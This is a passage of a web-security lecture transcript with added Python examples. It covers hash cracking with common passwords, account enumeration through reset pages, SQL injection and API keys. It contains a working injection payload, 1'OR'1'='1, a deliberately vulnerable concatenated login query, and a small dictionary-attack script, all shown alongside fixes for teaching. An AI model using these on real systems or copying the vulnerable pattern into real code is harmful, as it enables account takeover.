00:29:14,900 --> 00:29:18,472
Why can a website sometimes
not tell you what your password

661
00:29:18,472 --> 00:29:19,930
is but still allow you to reset it?

662
00:29:19,930 --> 00:29:23,425
Or still be able to log you
in if you knew your password?

663
00:29:23,425 --> 00:29:25,800
AUDIENCE: Because they're not
storing it in text anymore.

664
00:29:25,800 --> 00:29:27,339
So we don't know--

665
00:29:27,339 --> 00:29:28,380
BRIAN YU: Great, exactly.

666
00:29:28,380 --> 00:29:30,671
It's because of this idea of
the one-way hash function.

667
00:29:30,671 --> 00:29:33,770
That if you take the password, you
can generate this hashed version.

668
00:29:33,770 --> 00:29:35,894
But it's very difficult to
go the other way around.

669
00:29:35,894 --> 00:29:39,851
Such that, if this is what I have access
to in my database, I can look at this,

670
00:29:39,851 --> 00:29:42,350
and I don't actually know what
Anushree's or Elle's password

671
00:29:42,350 --> 00:29:43,304
originally was.

672
00:29:43,304 --> 00:29:46,470
But if you give me their password, then
I can hash it and compare it for you

673
00:29:46,470 --> 00:29:49,350
and be able to tell
you whether it matches.

674
00:29:49,350 --> 00:29:51,650
But I could reset it if I
wanted to just by replacing

675
00:29:51,650 --> 00:29:53,517
this field with some new hashed value.

676
00:29:53,517 --> 00:29:55,850
That would be something that
I could do, but I might not

677
00:29:55,850 --> 00:29:58,144
be able to actually tell
you what that password is.

678
00:29:58,144 --> 00:30:00,560
Of course, if these passwords
are common, like these are--

679
00:30:00,560 --> 00:30:03,800
if they're just passwords like
hello or password or 12345--

680
00:30:03,800 --> 00:30:06,710
then how might I still be able
to figure out a user's password

681
00:30:06,710 --> 00:30:10,870
even if the database looks like this?

682
00:30:10,870 --> 00:30:11,574
Yeah?

683
00:30:11,574 --> 00:30:13,912
AUDIENCE: You hash it and
compare the hashes or if you

684
00:30:13,912 --> 00:30:15,370
can look for common hashes and see.

685
00:30:15,370 --> 00:30:16,310
BRIAN YU: Exactly.

686
00:30:16,310 --> 00:30:20,360
If you know what the hash function
is, then someone trying to--

687
00:30:20,360 --> 00:30:22,640
a malicious user trying
to exploit the system

688
00:30:22,640 --> 00:30:26,180
might be able to just try a whole
bunch of different common passwords,

689
00:30:26,180 --> 00:30:27,950
figure out what their
hashed versions are,

690
00:30:27,950 --> 00:30:31,146
and then compare it to the versions
that are here in order to figure out

691
00:30:31,146 --> 00:30:32,270
what the password might be.

692
00:30:32,270 --> 00:30:34,490
So even this is not 100% foolproof.

693
00:30:34,490 --> 00:30:36,710
Someone who is trying a
bunch of common passwords

694
00:30:36,710 --> 00:30:39,117
might still be able to
figure out some of

695
00:30:39,117 --> 00:30:40,700
the passwords stored in this system.
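Here is a sketch of the attack just described. It assumes a hypothetical leaked table of unsalted SHA-256 hashes and a tiny hypothetical list of common passwords. The attacker hashes each guess once and looks for matches; no hash is ever "reversed."

```python
import hashlib

def sha256_hex(text: str) -> str:
    """Unsalted SHA-256 hex digest, as a naive users table might store it."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

# A hypothetical leaked table of unsalted password hashes.
leaked = {
    "anushree": sha256_hex("hello"),
    "elle": sha256_hex("12345"),
    "someone": sha256_hex("correct horse battery staple 9x!"),
}

common_passwords = ["password", "123456", "12345", "hello", "qwerty"]

# Hash every common password once to build a lookup table...
lookup = {sha256_hex(pw): pw for pw in common_passwords}

# ...then any stored hash that appears in the table is cracked.
cracked = {user: lookup[h] for user, h in leaked.items() if h in lookup}
print(cracked)  # {'anushree': 'hello', 'elle': '12345'}
```

Salting each password defeats a single precomputed table like this one, and a slow hash makes every guess more expensive. Even so, users with very common passwords can still be guessed eventually.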

696
00:30:40,700 --> 00:30:42,950
And so that's certainly
one vulnerability

697
00:30:42,950 --> 00:30:46,360
that could come up when we
think about database design.

698
00:30:46,360 --> 00:30:48,110
But another vulnerability,
and this is one

699
00:30:48,110 --> 00:30:50,235
we talked about a little
bit a couple of weeks ago,

700
00:30:50,235 --> 00:30:52,610
but we'll dive into in a
little more depth now--

701
00:30:52,610 --> 00:30:54,797
well, actually, first,
before we get there, sorry.

702
00:30:54,797 --> 00:30:56,630
So this was that Forgot
Your Password screen

703
00:30:56,630 --> 00:30:58,838
that we were talking a little
bit about before, where

704
00:30:58,838 --> 00:31:02,529
oftentimes what might happen is you'll
type in an email address, for instance,

705
00:31:02,529 --> 00:31:04,070
and you'll click Reset Your Password.

706
00:31:04,070 --> 00:31:05,986
And that will send you
an email that gives you

707
00:31:05,986 --> 00:31:08,610
the ability to reset your password.

708
00:31:08,610 --> 00:31:12,110
So another way that
databases could be insecure,

709
00:31:12,110 --> 00:31:16,610
another potential vulnerability
in the security of our database,

710
00:31:16,610 --> 00:31:20,330
has to do with what information
might be leaked by our database.

711
00:31:20,330 --> 00:31:22,970
What information can get out
when we don't want it to get out?

712
00:31:22,970 --> 00:31:26,240
And can anyone see a
potential vulnerability here,

713
00:31:26,240 --> 00:31:27,740
in terms of information leakage?

714
00:31:27,740 --> 00:31:30,740
Information that might be exposed
that we might otherwise not want

715
00:31:30,740 --> 00:31:34,550
exposed, just from a user interface
like this that people can use?

716
00:31:34,550 --> 00:31:37,938


717
00:31:37,938 --> 00:31:43,784
AUDIENCE: Your email address might be
exposed as it's going over the web.

718
00:31:43,784 --> 00:31:44,450
BRIAN YU: Great.

719
00:31:44,450 --> 00:31:46,380
So your email address
is potentially exposed

720
00:31:46,380 --> 00:31:48,070
as it's traveling from
one point to another.

721
00:31:48,070 --> 00:31:50,570
Although, with HTTPS and trying
to encrypt that information,

722
00:31:50,570 --> 00:31:52,730
usually we can help to
defend against that.

723
00:31:52,730 --> 00:31:55,370
But certainly the idea of
typing in an email address

724
00:31:55,370 --> 00:31:59,420
and clicking on reset password leads
to potential information leakage

725
00:31:59,420 --> 00:32:00,830
in other ways.

726
00:32:00,830 --> 00:32:04,400
Whereby if I type in an
email address of my account

727
00:32:04,400 --> 00:32:06,250
that I've perhaps
forgotten my password to,

728
00:32:06,250 --> 00:32:09,208
or a friend's account that I think
they've forgotten their password to,

729
00:32:09,208 --> 00:32:11,819
potentially, and I click
Reset Password, then

730
00:32:11,819 --> 00:32:14,360
I might see a notification that
very reasonably might just say,

731
00:32:14,360 --> 00:32:17,330
password reset email sent.

732
00:32:17,330 --> 00:32:21,320
What if I typed in the
email address of someone who

733
00:32:21,320 --> 00:32:23,302
didn't have an account on the website?

734
00:32:23,302 --> 00:32:25,010
What might you expect
this website to do?

735
00:32:25,010 --> 00:32:29,020


736
00:32:29,020 --> 00:32:29,520
Yeah?

737
00:32:29,520 --> 00:32:30,430
AUDIENCE: Give you an error message.

738
00:32:30,430 --> 00:32:31,610
BRIAN YU: Should give you
an error of some sort.

739
00:32:31,610 --> 00:32:34,760
Something like, error, there is no
such user with that email address.

740
00:32:34,760 --> 00:32:38,000
And now that we've seen those two
screens, you type in an email address

741
00:32:38,000 --> 00:32:41,390
and sometimes you get password reset
email sent and sometimes you get error,

742
00:32:41,390 --> 00:32:43,460
there is no user with
that email address.

743
00:32:43,460 --> 00:32:46,210
Where is the potential
information leakage here?

744
00:32:46,210 --> 00:32:46,710
Yeah?

745
00:32:46,710 --> 00:32:48,668
AUDIENCE: It could figure
out who the users are

746
00:32:48,668 --> 00:32:49,964
by trying out different emails.

747
00:32:49,964 --> 00:32:50,630
BRIAN YU: Great.

748
00:32:50,630 --> 00:32:53,000
Now, by using this screen, even if
I don't know people's passwords,

749
00:32:53,000 --> 00:32:55,940
I can figure out who has an account with
this website and who doesn't, right?

750
00:32:55,940 --> 00:32:58,731
If it's a bank, for instance, and
I type in someone's email address

751
00:32:58,731 --> 00:33:01,280
and I get this screen,
password reset email sent,

752
00:33:01,280 --> 00:33:04,560
now I know that this particular
user has an account with this bank.

753
00:33:04,560 --> 00:33:07,717
And that might not be something that
your application wants to expose.

754
00:33:07,717 --> 00:33:09,800
And so as you go about
designing web applications,

755
00:33:09,800 --> 00:33:12,000
you always want to be
bearing these things in mind.

756
00:33:12,000 --> 00:33:15,800
Thinking about what information
from the database is being exposed

757
00:33:15,800 --> 00:33:18,560
and how information that
I don't want to be exposed

758
00:33:18,560 --> 00:33:20,720
might be exposed to
users that I don't want

759
00:33:20,720 --> 00:33:22,190
to have access to that information.

760
00:33:22,190 --> 00:33:24,200
And certainly this is
one potential example

761
00:33:24,200 --> 00:33:26,502
that maybe you don't really
care if your users are

762
00:33:26,502 --> 00:33:29,210
able to know if other people have
accounts on the website or not.

763
00:33:29,210 --> 00:33:33,320
But maybe in a place where it's
more sensitive

764
00:33:33,320 --> 00:33:35,960
whether or not a user has an
account on the website,

765
00:33:35,960 --> 00:33:37,280
this might be something
you do care about.

766
00:33:37,280 --> 00:33:39,071
And you'd want to think
carefully about how

767
00:33:39,071 --> 00:33:41,840
you design the user interface,
about how users are interacting

768
00:33:41,840 --> 00:33:43,673
with the database, and
whether or not you're

769
00:33:43,673 --> 00:33:46,130
ever exposing information
that you don't want

770
00:33:46,130 --> 00:33:49,524
to ultimately be exposed to the user.
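One way to avoid the leak described above is to show the same message whether or not the address is registered. The sketch below is plain Python rather than a Flask route; the `REGISTERED` set and the `outbox` list are hypothetical stand-ins for a users table and a real mail sender.

```python
# Hypothetical stand-in for the users table: the set of registered emails.
REGISTERED = {"alice@example.com", "bob@example.com"}

# One message for every case, so the page reveals nothing about who has an account.
GENERIC_MESSAGE = ("If an account exists for that address, "
                   "a password reset email has been sent.")


def request_password_reset(email, registered=REGISTERED, outbox=None):
    """Return the same response whether or not the account exists.

    `outbox` collects the addresses that would actually be emailed;
    it is a placeholder for a real mail-sending function.
    """
    if outbox is None:
        outbox = []
    normalized = email.strip().lower()
    if normalized in registered:
        outbox.append(normalized)  # only real accounts receive an email
    # Both branches fall through to the identical response.
    return GENERIC_MESSAGE


sent = []
print(request_password_reset("alice@example.com", outbox=sent))
print(request_password_reset("mallory@example.com", outbox=sent))
print(sent)  # ['alice@example.com']
```

A caveat: if the real email is sent while the request is being handled, response times may still differ between the two cases, so sending it in the background can help keep the two responses indistinguishable.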

771
00:33:49,524 --> 00:33:50,690
Questions about any of that?

772
00:33:50,690 --> 00:33:53,498


773
00:33:53,498 --> 00:33:54,910
OK.

774
00:33:54,910 --> 00:33:57,470
So now moving onto the topic
about SQL and vulnerabilities

775
00:33:57,470 --> 00:34:00,850
that we did talk about a couple weeks
ago, and namely that was SQL injection.

776
00:34:00,850 --> 00:34:04,640
And does anyone recall what SQL
injection is and why it's a problem?

777
00:34:04,640 --> 00:34:05,420
Yeah?

778
00:34:05,420 --> 00:34:09,454
AUDIENCE: So in a SQL WHERE
clause, we added an OR condition.

779
00:34:09,454 --> 00:34:10,120
BRIAN YU: Great.

780
00:34:10,120 --> 00:34:12,969
We were able to add an or
condition, or more generally,

781
00:34:12,969 --> 00:34:17,210
just some sort of SQL code
into an input field, for instance,

782
00:34:17,210 --> 00:34:21,280
and get our own SQL code to
run on someone else's server.

783
00:34:21,280 --> 00:34:24,760
So we were able to effectively do
whatever we wanted with the database

784
00:34:24,760 --> 00:34:28,090
because we could run arbitrary
SQL queries on that database.

785
00:34:28,090 --> 00:34:30,760
And so the example we
looked at, which we'll

786
00:34:30,760 --> 00:34:33,100
look at an actual Flask
example of that today,

787
00:34:33,100 --> 00:34:36,389
is a user name and
password field where we

788
00:34:36,389 --> 00:34:38,139
might use that information
on the back end

789
00:34:38,139 --> 00:34:40,389
to run a SQL query that
looks something like this.

790
00:34:40,389 --> 00:34:43,510
Select star from users
where user name equals

791
00:34:43,510 --> 00:34:47,590
whatever the user name was and password
equals whatever the password was.

792
00:34:47,590 --> 00:34:50,984
And we imagine that if a user logs in,
like Alice with the password hello,

793
00:34:50,984 --> 00:34:53,650
then we'd end up running a query
that looks something like this,

794
00:34:53,650 --> 00:34:57,320
substituting in Alice as the
username, hello as the password,

795
00:34:57,320 --> 00:35:00,310
and now we're selecting from all the
users where Alice is the username

796
00:35:00,310 --> 00:35:01,670
and hello is the password.

797
00:35:01,670 --> 00:35:05,770
And if there is a matching one, then
this will return a row, and otherwise,

798
00:35:05,770 --> 00:35:06,312
it won't.

799
00:35:06,312 --> 00:35:08,020
And of course, in this
case, the password

800
00:35:08,020 --> 00:35:10,380
is not hashed, though
in a more secure system,

801
00:35:10,380 --> 00:35:14,710
we might want to hash that password
first and then run this query.
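A minimal sketch of what hashing the password could look like, using PBKDF2 from Python's standard library (`hashlib.pbkdf2_hmac`). The iteration count and 16-byte salt are illustrative assumptions, not values from the lecture. Because each user gets a random salt, a common pattern is to look up the row by username first and then verify the hash in Python, rather than putting the hash itself into the `WHERE` clause.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # illustrative work factor (an assumption); tune for your hardware


def hash_password(password, salt=None):
    """Return (salt, digest) computed with PBKDF2-HMAC-SHA256."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for each user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, expected_digest):
    """Recompute the hash with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected_digest)


# Store (salt, stored) in the users row instead of the plain-text password.
salt, stored = hash_password("hello")
print(verify_password("hello", salt, stored))    # True
print(verify_password("goodbye", salt, stored))  # False
```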

802
00:35:14,710 --> 00:35:16,490
But what might go wrong here?

803
00:35:16,490 --> 00:35:20,350
So we talked about what would happen if
someone types in Alice as the user name

804
00:35:20,350 --> 00:35:27,760
and something like this as the
password, 1'OR'1'='1, which seems sort

805
00:35:27,760 --> 00:35:31,510
of complicated, but the result of that
was that when we plugged everything

806
00:35:31,510 --> 00:35:37,000
in, now we're selecting from users where
the user name is Alice and the password

807
00:35:37,000 --> 00:35:38,650
is 1-- which it isn't--

808
00:35:38,650 --> 00:35:41,200
or the string 1 equals the string 1.

809
00:35:41,200 --> 00:35:44,720
Well, this is, of course, true, and
now we're going to get some row back.
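To see exactly what the string concatenation produces, here is the query-building step on its own. `build_login_query` is a hypothetical helper, not code from the lecture, and the payload is written with spaces for readability; it behaves the same as the compact form.

```python
def build_login_query(username, password):
    # DANGEROUS: user input is pasted directly into the SQL text.
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


print(build_login_query("alice", "hello"))
print(build_login_query("alice", "1' OR '1' = '1"))
```

The second call yields `... WHERE username = 'alice' AND password = '1' OR '1' = '1'`. Because `AND` binds more tightly than `OR`, the condition reads as `(username = 'alice' AND password = '1') OR '1' = '1'`, which is true for every row in the table.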

810
00:35:44,720 --> 00:35:46,720
And so how might that
actually work in practice?

811
00:35:46,720 --> 00:35:50,740
Let's take a look at a web application
that implements this very idea of just

812
00:35:50,740 --> 00:35:53,590
a very simple login system
where an exploit like this

813
00:35:53,590 --> 00:35:57,500
can help anyone get access
to any other user account.

814
00:35:57,500 --> 00:36:03,790
So let's take a look at
application.py inside of injection.

815
00:36:03,790 --> 00:36:09,430
So this is just a Flask
application, and our default route,

816
00:36:09,430 --> 00:36:14,169
this index route, first checks if there
is a username inside of the session.

817
00:36:14,169 --> 00:36:16,460
If there is a user name in
the session, in other words,

818
00:36:16,460 --> 00:36:18,480
if someone is logged into
this current session,

819
00:36:18,480 --> 00:36:21,710
we'll go ahead and render a
user.html page that will just display

820
00:36:21,710 --> 00:36:23,750
who's currently logged in for instance.

821
00:36:23,750 --> 00:36:25,750
Otherwise, if there
is no user, then we're

822
00:36:25,750 --> 00:36:29,380
going to go ahead and render a
login.html page that would give people

823
00:36:29,380 --> 00:36:32,410
the option to log into this website.

824
00:36:32,410 --> 00:36:37,220
And now, let's take a look at what's
happening inside of the login function.

825
00:36:37,220 --> 00:36:42,220
So first thing we're doing is someone
logs in by submitting a post request

826
00:36:42,220 --> 00:36:43,870
to /login.

827
00:36:43,870 --> 00:36:47,170
Then we get the user name by going
request.form.get("username").

828
00:36:47,170 --> 00:36:49,710
We get the password by
request.form.get("password"),

829
00:36:49,710 --> 00:36:51,979
just extracting that
information from the form.

830
00:36:51,979 --> 00:36:53,770
We're going to print
out what the query is.

831
00:36:53,770 --> 00:36:55,670
You'll see an example
of that in a moment,

832
00:36:55,670 --> 00:36:57,220
but this isn't strictly necessary.

833
00:36:57,220 --> 00:36:59,590
The interesting thing
is here, on line 33.

834
00:36:59,590 --> 00:37:03,040
We're running db.execute, running
a database query, and saying,

835
00:37:03,040 --> 00:37:06,340
select star from users
where username equals

836
00:37:06,340 --> 00:37:08,810
and then plugging in the
username here, and password

837
00:37:08,810 --> 00:37:11,560
equals, plugging in the
password there, and then

838
00:37:11,560 --> 00:37:15,070
just getting the first row
that comes back from that.

839
00:37:15,070 --> 00:37:18,100
And if a row does come back from
that, if the query was successful,

840
00:37:18,100 --> 00:37:21,130
then we log the user in by
storing them inside the session

841
00:37:21,130 --> 00:37:23,840
and redirecting them
back to the index page.

842
00:37:23,840 --> 00:37:27,970
In other words, we render the login
page again, saying invalid=True,

843
00:37:27,970 --> 00:37:30,790
meaning there was some
authentication problem.

844
00:37:30,790 --> 00:37:33,280
So that's all fairly straightforward.

845
00:37:33,280 --> 00:37:35,757
And of course, the key
vulnerability to look at here

846
00:37:35,757 --> 00:37:38,590
is the fact that whatever the
username and whatever the password is,

847
00:37:38,590 --> 00:37:40,900
we just plugged them
straight into the SQL query

848
00:37:40,900 --> 00:37:45,530
by just using string concatenation
in Python to join this all together.
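The demo's login logic can be approximated with Python's built-in `sqlite3` module and an in-memory table. This is a sketch, not the lecture's `application.py`: the table layout and the two users are assumptions, and passwords are stored in plain text only to mirror the demo.

```python
import sqlite3


def make_db():
    """Build a throwaway in-memory users table (plain-text passwords, as in the demo)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "hello"), ("bob", "secret")],
    )
    return db


def vulnerable_login(db, username, password):
    # DANGEROUS: user input is concatenated straight into the SQL text.
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    print(query)  # like the demo, log the query that actually runs
    return db.execute(query).fetchone()


db = make_db()
print(vulnerable_login(db, "alice", "hello"))         # (1, 'alice', 'hello')
print(vulnerable_login(db, "alice", "goodbye"))       # None
print(vulnerable_login(db, "bob", "1' OR '1' = '1"))  # a row, despite the wrong password
```

With the injected password the `WHERE` clause is true for every row, so `fetchone()` returns whichever row comes first (in practice Alice's), which matches the demo showing "Welcome, alice" regardless of the username typed.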

849
00:37:45,530 --> 00:37:53,830
So now if I were to run this Flask
application and take this URL

850
00:37:53,830 --> 00:37:56,890
and go to that URL, I'm
faced with this login form.

851
00:37:56,890 --> 00:37:58,700
And I can type in Alice--

852
00:37:58,700 --> 00:38:01,690
and normally you would
want your password field

853
00:38:01,690 --> 00:38:05,652
to use dots by setting the input type
to be password so nobody can see it,

854
00:38:05,652 --> 00:38:08,110
but for the sake of example,
so you can see what I'm doing,

855
00:38:08,110 --> 00:38:10,540
I've changed the password field
to just be a text field so you can

856
00:38:10,540 --> 00:38:12,190
see what password is being typed in.

857
00:38:12,190 --> 00:38:15,240
But of course, you would never
actually want to do that in practice.

858
00:38:15,240 --> 00:38:18,010
But if I type hello as the
password, which is Alice's password,

859
00:38:18,010 --> 00:38:19,980
and click Submit, now
I'm logged in as Alice.

860
00:38:19,980 --> 00:38:21,850
It says, Welcome, alice.

861
00:38:21,850 --> 00:38:23,744
And you can check by looking at the log.

862
00:38:23,744 --> 00:38:24,910
Here's what got printed out.

863
00:38:24,910 --> 00:38:26,170
Here was the query that ran.

864
00:38:26,170 --> 00:38:30,190
Select star from users, where username
equals Alice and password equals hello,

865
00:38:30,190 --> 00:38:32,580
and of course, that returned
back Alice as my one row,

866
00:38:32,580 --> 00:38:34,980
and so that was all good.

867
00:38:34,980 --> 00:38:36,510
I'll log out now.

868
00:38:36,510 --> 00:38:39,790
If I try logging in with Alice
with a fake password, goodbye,

869
00:38:39,790 --> 00:38:41,920
which is not the correct
password, and Submit,

870
00:38:41,920 --> 00:38:44,050
I get Error, invalid credentials.

871
00:38:44,050 --> 00:38:44,565
Why is that?

872
00:38:44,565 --> 00:38:45,940
Well, here is the query that ran.

873
00:38:45,940 --> 00:38:50,620
Select star from users, where user name
is Alice and password equals goodbye.

874
00:38:50,620 --> 00:38:53,160
Well, that's not going
to return any results.

875
00:38:53,160 --> 00:38:56,230
But of course, the injection attack
happens if I type user name Alice,

876
00:38:56,230 --> 00:39:06,157
or user name, any user name that I
want, and type in 1'OR'1'='1, like that,

877
00:39:06,157 --> 00:39:09,240
where now if I submit that, no matter
who the user is, now I see, Welcome,

878
00:39:09,240 --> 00:39:09,740
alice.

879
00:39:09,740 --> 00:39:12,750
I've logged into this user's
account, and why did that happen?

880
00:39:12,750 --> 00:39:14,250
Well, here's the query that was run.

881
00:39:14,250 --> 00:39:19,440
Select star from users where username
equals Alice and password equals 1 or 1

882
00:39:19,440 --> 00:39:20,040
equals 1.

883
00:39:20,040 --> 00:39:23,700
So by injecting arbitrary
SQL logic into this code,

884
00:39:23,700 --> 00:39:26,854
I was able to gain access to any
user account that I wanted to.

885
00:39:26,854 --> 00:39:28,770
And that's why it's very
important, when we're

886
00:39:28,770 --> 00:39:32,640
using SQL and running SQL queries, that
we're careful to avoid SQL injection.

887
00:39:32,640 --> 00:39:35,940
That any time user input
is being put into a query,

888
00:39:35,940 --> 00:39:38,820
we want to escape any
potential characters that

889
00:39:38,820 --> 00:39:42,090
might be part of a SQL
query in order to make sure

890
00:39:42,090 --> 00:39:44,520
that nobody can just
run whatever SQL queries

891
00:39:44,520 --> 00:39:46,710
they want to inside of our code.

892
00:39:46,710 --> 00:39:49,380
And SQLAlchemy, which you may
have been using in Python in order

893
00:39:49,380 --> 00:39:51,720
to do some of this stuff,
automatically takes

894
00:39:51,720 --> 00:39:54,210
care of doing some of
that escaping for you,

895
00:39:54,210 --> 00:39:56,940
if you're passing in the
parameters in a Python dictionary

896
00:39:56,940 --> 00:39:58,980
for instance, which you
might have done before.

897
00:39:58,980 --> 00:40:02,980
And so that's certainly
something you can use as well.
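For comparison, here is the same lookup with named placeholders and a dictionary of parameters, in the spirit of the approach described above. It uses the standard-library `sqlite3` module rather than SQLAlchemy so that it runs on its own; the table and users are assumptions for illustration. The driver binds the values instead of pasting them into the SQL text, so the quotes in the payload are treated as part of the password string.

```python
import sqlite3


def make_db():
    """A throwaway in-memory users table for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "hello"), ("bob", "secret")],
    )
    return db


def safe_login(db, username, password):
    # Named placeholders: sqlite3 binds the dictionary values as data,
    # so quote characters inside them cannot change the query's structure.
    return db.execute(
        "SELECT * FROM users WHERE username = :username AND password = :password",
        {"username": username, "password": password},
    ).fetchone()


db = make_db()
print(safe_login(db, "alice", "hello"))           # (1, 'alice', 'hello')
print(safe_login(db, "alice", "1' OR '1' = '1"))  # None
```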

898
00:40:02,980 --> 00:40:05,490
Questions about SQL vulnerabilities?

899
00:40:05,490 --> 00:40:08,910
Whether it was reasons why we might
want to use hashed passwords inside

900
00:40:08,910 --> 00:40:11,655
of our database or how we might
accidentally leak information,

901
00:40:11,655 --> 00:40:15,060
as with that forgot your
password page, or as

902
00:40:15,060 --> 00:40:18,090
to how we might have gone
about using SQL injection

903
00:40:18,090 --> 00:40:20,370
to gain access to unauthorized data.

904
00:40:20,370 --> 00:40:23,730


905
00:40:23,730 --> 00:40:25,250
OK.

906
00:40:25,250 --> 00:40:27,770
Next up, before we take
our break, was about APIs.

907
00:40:27,770 --> 00:40:31,130
So we were thinking about Application
Programming Interfaces, the idea

908
00:40:31,130 --> 00:40:34,670
that people could write APIs
for their web applications

909
00:40:34,670 --> 00:40:39,406
that let people programmatically gain
access to information about whatever it

910
00:40:39,406 --> 00:40:41,030
is that your website is designed to do.

911
00:40:41,030 --> 00:40:42,980
So in the case of book
reviews, maybe you

912
00:40:42,980 --> 00:40:45,962
had an API route that returned
the reviews for a particular book.

913
00:40:45,962 --> 00:40:48,170
But you might imagine that
other sites might give you

914
00:40:48,170 --> 00:40:49,550
API routes that do other things.

915
00:40:49,550 --> 00:40:51,383
We didn't do this for
project three, but you

916
00:40:51,383 --> 00:40:55,160
might imagine that in a restaurant,
for instance, that had a website,

917
00:40:55,160 --> 00:40:58,340
you might have an API route that gives
you back your orders, for instance.

918
00:40:58,340 --> 00:41:01,832
What security considerations
should go into designing APIs?

919
00:41:01,832 --> 00:41:03,290
Or what could potentially go wrong?

920
00:41:03,290 --> 00:41:05,932


921
00:41:05,932 --> 00:41:07,890
Broad questions, so lots
of possibilities here.

922
00:41:07,890 --> 00:41:15,330


923
00:41:15,330 --> 00:41:18,310
AUDIENCE: You can expose stuff
that shouldn't be exposed.

924
00:41:18,310 --> 00:41:20,685
BRIAN YU: You can expose stuff
that shouldn't be exposed.

925
00:41:20,685 --> 00:41:23,140
So that's an interesting
idea, that if I, for instance,

926
00:41:23,140 --> 00:41:27,840
had an API for being able to look at
my Amazon orders or look at the food

927
00:41:27,840 --> 00:41:30,090
that I've ordered from a
restaurant in particular,

928
00:41:30,090 --> 00:41:32,940
I would want that to somehow
only be accessible to me

929
00:41:32,940 --> 00:41:34,810
and not accessible to someone else.

930
00:41:34,810 --> 00:41:38,340
And so how would we implement
this idea of some people

931
00:41:38,340 --> 00:41:41,070
should be able to access
certain information by the API,

932
00:41:41,070 --> 00:41:44,040
and other people should not be
able to access that information

933
00:41:44,040 --> 00:41:49,180
and should only be able to access
some other pieces of information?

934
00:41:49,180 --> 00:41:50,247
AUDIENCE: Authentication.

935
00:41:50,247 --> 00:41:51,580
BRIAN YU: Authentication, great.

936
00:41:51,580 --> 00:41:54,910
We can use what are commonly
known as API keys, which are just

937
00:41:54,910 --> 00:41:57,940
strings of text that are
associated with a particular user,

938
00:41:57,940 --> 00:42:00,460
effectively like a
password, but for APIs.

939
00:42:00,460 --> 00:42:02,472
Such that in order to
make an API request,

940
00:42:02,472 --> 00:42:04,180
you not only need to
submit your request,

941
00:42:04,180 --> 00:42:06,370
but you also need to
submit your API key.

942
00:42:06,370 --> 00:42:09,200
And then it's on the web application
to check that key, to say,

943
00:42:09,200 --> 00:42:13,490
does this key have permission to look at
the things that it's trying to look at?

944
00:42:13,490 --> 00:42:15,370
And this is the idea of
route authentication,

945
00:42:15,370 --> 00:42:17,860
that if someone makes an API
request to a particular route,

946
00:42:17,860 --> 00:42:21,310
you better first make sure that whoever
is making that request has permission

947
00:42:21,310 --> 00:42:24,710
to see whatever they're asking to see
before you actually show it to them.

948
00:42:24,710 --> 00:42:26,890
And so API keys can be
used for that as well.
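A minimal sketch of route authentication with API keys, using the restaurant-orders example. The keys, users, and orders are made-up data, and the two exception classes stand in for the HTTP 401 and 403 responses a real web application would return.

```python
# Hypothetical data: each API key belongs to one user.
API_KEYS = {"key-alice-123": "alice", "key-bob-456": "bob"}
ORDERS = {"alice": ["pizza"], "bob": ["salad", "soup"]}


class Unauthorized(Exception):
    """No valid API key was supplied (HTTP 401 in a real app)."""


class Forbidden(Exception):
    """The key is valid but may not see this resource (HTTP 403 in a real app)."""


def get_orders(api_key, username):
    """Return `username`'s orders only if `api_key` belongs to that user."""
    owner = API_KEYS.get(api_key)
    if owner is None:
        raise Unauthorized("missing or unknown API key")
    if owner != username:
        raise Forbidden("this key may only read its own orders")
    return ORDERS.get(username, [])


print(get_orders("key-alice-123", "alice"))  # ['pizza']
try:
    get_orders("key-alice-123", "bob")
except Forbidden as err:
    print("403:", err)  # 403: this key may only read its own orders
```

Real keys should be long and unguessable, for example generated with `secrets.token_urlsafe(32)`, rather than readable strings like the ones above.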

949
00:42:26,890 --> 00:42:29,200
In addition, they're often
used for rate limiting,

950
00:42:29,200 --> 00:42:32,116
where if you're worried about
someone overusing an API

951
00:42:32,116 --> 00:42:34,990
or abusing your server by making
thousands upon thousands of requests

952
00:42:34,990 --> 00:42:37,090
in a short period of
time, you can rate limit

953
00:42:37,090 --> 00:42:40,060
and say, well, I only want
you to be able to make

954
00:42:40,060 --> 00:42:42,440
x number of requests per hour.

955
00:42:42,440 --> 00:42:44,770
And if you have an API
key, then it's pretty easy

956
00:42:44,770 --> 00:42:47,520
to implement this idea of rate
limiting because all you have to do

957
00:42:47,520 --> 00:42:50,410
is keep track inside of a
table somewhere this API key

958
00:42:50,410 --> 00:42:54,220
has used 28 requests in the last hour,
so they're hitting up against their limit.

959
00:42:54,220 --> 00:42:56,320
And so if they use any
more, we should just

960
00:42:56,320 --> 00:42:59,890
stop allowing them to use the API key
until it refreshes for the next hour,

961
00:42:59,890 --> 00:43:00,850
for instance.
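Rate limiting per API key can be sketched as a fixed hourly window: count each key's requests, refuse once the limit is reached, and start over when the next hour begins. The lecture describes keeping these counts in a table; this sketch keeps them in a dictionary, and the `clock` parameter is an assumption added so the behavior can be demonstrated without waiting an hour.

```python
import time


class HourlyRateLimiter:
    """Fixed-window limiter: each API key gets `limit` requests per window."""

    def __init__(self, limit, window_seconds=3600, clock=time.time):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock   # injectable time source, handy for testing
        self.counts = {}     # api_key -> (window_index, requests_so_far)

    def allow(self, api_key):
        window_index = int(self.clock() // self.window)
        stored_window, count = self.counts.get(api_key, (window_index, 0))
        if stored_window != window_index:
            count = 0        # a new hour has started, so the count refreshes
        if count >= self.limit:
            return False     # over the limit: refuse this request
        self.counts[api_key] = (window_index, count + 1)
        return True


now = [0.0]
limiter = HourlyRateLimiter(limit=3, clock=lambda: now[0])
print([limiter.allow("key-alice-123") for _ in range(4)])  # [True, True, True, False]
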